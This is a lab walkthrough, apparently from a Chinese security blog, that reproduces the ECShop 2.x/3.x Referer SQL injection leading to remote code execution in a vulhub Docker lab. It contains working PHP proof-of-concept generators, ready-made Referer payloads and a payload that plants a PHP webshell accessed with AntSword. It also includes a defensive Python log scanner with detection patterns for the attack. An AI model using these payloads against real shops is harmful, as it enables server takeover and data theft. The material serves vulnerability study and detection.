Starting the lab environment
In a terminal, change into the vulhub lab directory prepared beforehand and start the containers:
cd vulhub-master/ecshop/xianzhi-2017-02-82239600
sudo docker-compose up -d
After running the commands:
ECShop 2.x:
Open http://ip:8080 in a browser; if the page loads normally, the lab is up.
ECShop 3.x:
Open http://ip:8081 in a browser; if the page loads normally, the lab is up.
Then complete the installation for each version; the database host is mysql, and both the username and password are root.
Vulnerability discovery
Root cause
- The Referer value is not validated at all and is used directly, so an attacker controls it.
- The value is split on _echash, which is a fixed constant: 2.x: 554fcae493e564ee0dc75bdf2ebf94ca, 3.x: 45ea207d7a2b68c49582d2d22adf953a.
- The insert_ads function builds its SQL by unsafe string concatenation, leading to SQL injection.
- The make_val function concatenates user-controlled content into a string that is later evaluated.
Chaining these four points yields remote code execution; see the referenced article for the detailed analysis.
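Added here as a defender's check, not code from the original post or from ECShop: because the _echash separator is a fixed constant, a Referer built as {hash}ads|{serialized array}{hash} is recognisable in web server logs. The script assumes Apache combined log format and runs over constructed sample lines; the function names and the sample data are my own.

```python
import re

# Fixed _echash separators the writeup lists for ECShop 2.x and 3.x.
ECHASH = {
    "554fcae493e564ee0dc75bdf2ebf94ca": "2.x",
    "45ea207d7a2b68c49582d2d22adf953a": "3.x",
}

# Shape of the abused Referer: {hash}ads|{PHP serialized array}{same hash}
_REFERER = re.compile(r"^([0-9a-f]{32})ads\|(a:\d+:\{.*\})\1$", re.S)
# Fragments that only make sense as injected SQL
_SQLI = re.compile(r"(?i)union\s*/\*|\*/\s*select|\bselect\b.*\b0x[0-9a-f]+", re.S)

# Apache combined log format; quotes inside the Referer field are logged as \"
_LOG = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<ref>(?:[^"\\]|\\.)*)" "[^"]*"$'
)

def inspect_referer(referer):
    """Return a finding when the Referer has the {hash}ads|{serialized}{hash} shape, else None."""
    m = _REFERER.match(referer.strip())
    if not m:
        return None
    echash, payload = m.group(1), m.group(2)
    return {
        "version": ECHASH.get(echash, "unknown-hash"),  # a known constant is high confidence
        "sqli": bool(_SQLI.search(payload)),             # SQL fragments inside the payload
        "payload": payload,
    }

def scan_log(lines):
    """Return (client_ip, request, finding) for every log line whose Referer matches."""
    hits = []
    for line in lines:
        m = _LOG.match(line)
        if not m:
            continue
        finding = inspect_referer(m.group("ref").replace('\\"', '"'))
        if finding:
            hits.append((m.group("ip"), m.group("req"), finding))
    return hits

# Constructed sample log lines (not from the post): one attack, one benign request
SAMPLE_LOG = [
    r'''192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /user.php HTTP/1.1" 200 512 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\"num\";s:19:\"*/SELECT 1,0x41-- -\";s:2:\"id\";s:11:\"-1' UNION/*\";}554fcae493e564ee0dc75bdf2ebf94ca" "Mozilla/5.0"''',
    r'''192.0.2.11 - - [01/Jan/2024:10:00:01 +0000] "GET /user.php HTTP/1.1" 200 512 "http://shop.example/index.php" "Mozilla/5.0"''',
]
```

A Referer carrying either constant deserves an alert even when the sqli flag is false, since no legitimate client ever sends the application's internal separator.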
Exploitation
By hand
Once the principle is understood, we exploit the vulnerability. The environment is as follows:
Target: 192.168.75.146
Attacker: 192.168.75.144
First, prepare the POC; the code is as follows:
<?php
// \$ is escaped so the literal text $asd stays in the payload
$shell = bin2hex("{\$asd'];phpinfo\t();//}xxx");
$id = "-1' UNION/*";
$arr = [
    "num" => sprintf('*/SELECT 1,0x%s,2,4,5,6,7,8,0x%s,10-- -', bin2hex($id), $shell),
    "id" => $id
];
$s = serialize($arr);
$hash3 = '45ea207d7a2b68c49582d2d22adf953a';
$hash2 = '554fcae493e564ee0dc75bdf2ebf94ca';
echo "POC for ECShop 2.x: \n";
echo "{$hash2}ads|{$s}{$hash2}";
echo "\n\nPOC for ECShop 3.x: \n";
echo "{$hash3}ads|{$s}{$hash3}";
?>
Run the code above with php to generate the POC:
POC for ECShop 2.x:
554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca
POC for ECShop 3.x:
45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953a
ECShop 2.x POC exploitation:
Capture a request to the ECShop user login page in Burp, send it to Repeater, and replace the request with the POC below:
GET /user.php HTTP/1.1
Host: [target IP]
Referer: [generated POC]
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 1
After sending, the following result is returned, confirming that the exploit succeeded.
ECShop 3.x POC exploitation:
Capture a request to the ECShop user login page in Burp, send it to Repeater, and replace the request with the POC below:
GET /user.php HTTP/1.1
Host: [target IP]
Referer: [generated POC]
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 1
After sending, the following result is returned, confirming that the exploit succeeded.
Get WebShell
Generate the POC for obtaining a WebShell; the code is as follows:
<?php
// \$ is escaped so the literal text $asd stays in the payload
$shell = bin2hex("{\$asd'];assert(base64_decode('ZmlsZV9wdXRfY29udGVudHMoJ2V2YWwucGhwJywnPD9waHAgZXZhbCgkX1BPU1RbY21kXSk7ID8+Jyk='));//}xxx");
$id = "-1' UNION/*";
$arr = [
    "num" => sprintf('*/SELECT 1,0x%s,2,4,5,6,7,8,0x%s,10-- -', bin2hex($id), $shell),
    "id" => $id
];
$s = serialize($arr);
$hash3 = '45ea207d7a2b68c49582d2d22adf953a';
$hash2 = '554fcae493e564ee0dc75bdf2ebf94ca';
echo "POC for ECShop 2.x: \n";
echo "{$hash2}ads|{$s}{$hash2}";
echo "\n\nPOC for ECShop 3.x: \n";
echo "{$hash3}ads|{$s}{$hash3}";
?>
// Original form
file_put_contents('eval.php','<?php eval($_POST[cmd]); ?>')
// base64-encoded
ZmlsZV9wdXRfY29udGVudHMoJ2V2YWwucGhwJywnPD9waHAgZXZhbCgkX1BPU1RbY21kXSk7ID8+Jyk=
The generated Get WebShell POC is as follows:
POC for ECShop 2.x:
554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:297:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a32563259577775634768774a79776e50443977614841675a585a686243676b58314250553152625932316b58536b374944382b4a796b3d2729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca
POC for ECShop 3.x:
45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:297:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a32563259577775634768774a79776e50443977614841675a585a686243676b58314250553152625932316b58536b374944382b4a796b3d2729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953a
Plug the POC into the request as above, then connect with AntSword; the connection screenshot is below:
This concludes the reproduction of the ECShop SQL injection and remote code execution vulnerability.
Originally published on the WeChat public account (0xh4ck3r): ECShop 4.x collection_list SQL injection